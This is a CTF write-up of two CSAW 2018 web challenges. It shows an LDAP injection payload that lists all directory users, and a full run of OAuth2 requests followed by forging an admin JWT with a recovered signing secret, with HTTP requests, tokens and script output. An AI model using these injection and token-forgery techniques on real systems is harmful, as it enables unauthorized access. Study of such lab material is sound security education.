# Ldab

Difficulty: **★☆☆☆☆**

Sovled: **432 / 1448**

Tag: **Blackbox, Ldap injection**

Link: **http://web.chal.csaw.io:8080**

**Idea**  
\- Search for list all of all users and groups

**Solution**  
1\. Payload ldap injection
[here](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20injection)  
2\. Request `/index.php?search=*)(uid=*))(|(uid=*`  
3\. Flag `flag{ld4p_inj3ction_i5_a_th1ng}`

# SSO

Difficulty: **★★★☆☆**

Sovled: **210 / 1448**

Tag: **Blackbox, oauth2, sigle sign on, JWT token**

Link: **web.chal.csaw.io:9000**

**Idea**  
\- Use oauth 2.0 for authentication and request the resources  
\- Crack signature jwt for get flag

**Solution**  
1\. Get code authorization: `/oauth2/authorize`  
\- response_type: `code`  
\- redirect_uri: `http://web.chal.csaw.io:9000/protected`  
\- state: `http://web.chal.csaw.io:9000/protected`  
\- scopy: `http://web.chal.csaw.io:9000/protected`  
\- client_id: `admin`  
\- client_secret: `admin`

*Request*  
```  
POST /oauth2/authorize HTTP/1.1  
Host: web.chal.csaw.io:9000  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 228

response_type=code&redirect_uri=http://web.chal.csaw.io:9000/protected&state=http%3A%2F%2Fweb.chal%2Ecsaw%2Eio%3a9000%2Fprotected&scope=http%3A%2F%2Fweb.chal%2Ecsaw%2Eio%3a9000%2Fprotected&client_id=admin&client_secret=admin  
```  
*Response*  
```  
http://web.chal.csaw.io:9000/protected?code=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjbGllbnRfaWQiOiJhZG1pbiIsInJlZGlyZWN0X3VyaSI6Imh0dHA6Ly93ZWIuY2hhbC5jc2F3LmlvOjkwMDAvcHJvdGVjdGVkIiwiaWF0IjoxNTM3MDYzODAzLCJleHAiOjE1MzcwNjQ0MDN9.fTuYlRB4HeXwKC6uo90s4Xqb3UHeoZMAoYjhaMuzdFw&state=http%3A%2F%2Fweb.chal.csaw.io%3A9000%2Fprotected  
```

2\. Get token for authentication: `/oauth2/token`:  
\- code: receive from request 1  
\- state: `http%3A%2F%2Fweb.chal.csaw.io%3A9000%2Fprotected`  
\- grant_type: `authorization_code`  
\- redirect_uri: `http://web.chal.csaw.io:9000/protected`  
\- client_secret: `admin`  
\- client_id: `admin`

*Request*  
```  
POST /oauth2/token HTTP/1.1  
Host: web.chal.csaw.io:9000  
Connection: close  
Origin: http://web.chal.csaw.io:9000  
Content-Type: application/x-www-form-urlencoded  
Referer: http://web.chal.csaw.io:9000/oauth2/authorize  
Content-Length: 411

code=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjbGllbnRfaWQiOiJhZG1pbiIsInJlZGlyZWN0X3VyaSI6Imh0dHA6Ly93ZWIuY2hhbC5jc2F3LmlvOjkwMDAvcHJvdGVjdGVkIiwiaWF0IjoxNTM3MDYzODAzLCJleHAiOjE1MzcwNjQ0MDN9.fTuYlRB4HeXwKC6uo90s4Xqb3UHeoZMAoYjhaMuzdFw&state=http%3A%2F%2Fweb.chal.csaw.io%3A9000%2Fprotected&grant_type=authorization_code&redirect_uri=http://web.chal.csaw.io:9000/protected&client_secret=ufoundme!&client_id=admin  
```

*Response*  
```  
{"token_type":"Bearer","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoidXNlciIsInNlY3JldCI6InVmb3VuZG1lISIsImlhdCI6MTUzNzA2Mzg3MCwiZXhwIjoxNTM3MDY0NDcwfQ.4Vlaf8qsPoPyNNIX6CNVgn_w1zHbnVJEg5dJQZmMeGk"}  
```

*Raw token*  
```  
{"alg":"HS256","typ":"JWT"}{"type":"user","secret":"ufoundme!","iat":1537063870,"exp":1537064470}
+ signature`  
```

3\. Crack signature JWT, change token  
\- Crack online on https://jwt.io/  
![Crack JWT token](./resource_web/web-sso.png)

4\. Get flag

```  
GET /protected HTTP/1.1  
Host: web.chal.csaw.io:9000  
Authorization: Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWRtaW4iLCJzZWNyZXQiOiJ1Zm91bmRtZSEiLCJpYXQiOjE1MzcwNjM4NzAsImV4cCI6MTUzNzA2NDQ3MH0.0nrhvscHLcDxopIVt6FzV8mn2KhGI4CbEMfOsrHvnJ0  
Connection: close  
Origin: http://web.chal.csaw.io:9000  
Content-Type: application/x-www-form-urlencoded; charset=utf-8  
Referer: http://web.chal.csaw.io:9000/oauth2/authorize  
Content-Length: 369  
```

5\. Flag: `flag{JsonWebTokensaretheeasieststorage-
lessdataoptiononthemarket!theyrelyonsupersecureblockchainlevelencryptionfortheirmethods}`

6\. Code python for solve challenge: [here](./resource_web/sso.py)

```  
$ Request to oauth2/authorize ...  
> Code =
> eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjbGllbnRfaWQiOiJhZG1pbiIsInJlZGlyZWN0X3VyaSI6Imh0dHA6Ly93ZWIuY2hhbC5jc2F3LmlvOjkwMDAvcHJvdGVjdGVkIiwiaWF0IjoxNTM3MTM2NTQ2LCJleHAiOjE1MzcxMzcxNDZ9.kV123Uzgg4H7i_DxNg6u6QCBiFP2y3sMFNzxZhXtrQw  
$ Request to oauth2/token ...  
> Token =
> eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoidXNlciIsInNlY3JldCI6InVmb3VuZG1lISIsImlhdCI6MTUzNzEzNjU0OCwiZXhwIjoxNTM3MTM3MTQ4fQ.inn4CGJOX4ID6kab4YdK70ZKqBwV0Be92s6dp2yAUvA  
$ Crack signature and change data ...  
> New token =
> eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjoiYWRtaW4iLCJzZWNyZXQiOiJ1Zm91bmRtZSEiLCJpYXQiOjE1MzcxMzY1NDgsImV4cCI6MTUzNzEzNzE0OH0.60wi5F1gDUUqNLCKLPDAiENUBRJWhFEzE1xeFqc8RrQ  
$ Request to /protected ...  
flag{JsonWebTokensaretheeasieststorage-
lessdataoptiononthemarket!theyrelyonsupersecureblockchainlevelencryptionfortheirmethods}  
```

Original writeup (https://github.com/TryCTFAgain/CTF-
Writeups/blob/master/2018/CSAW%20CTF'18/web.md#sso).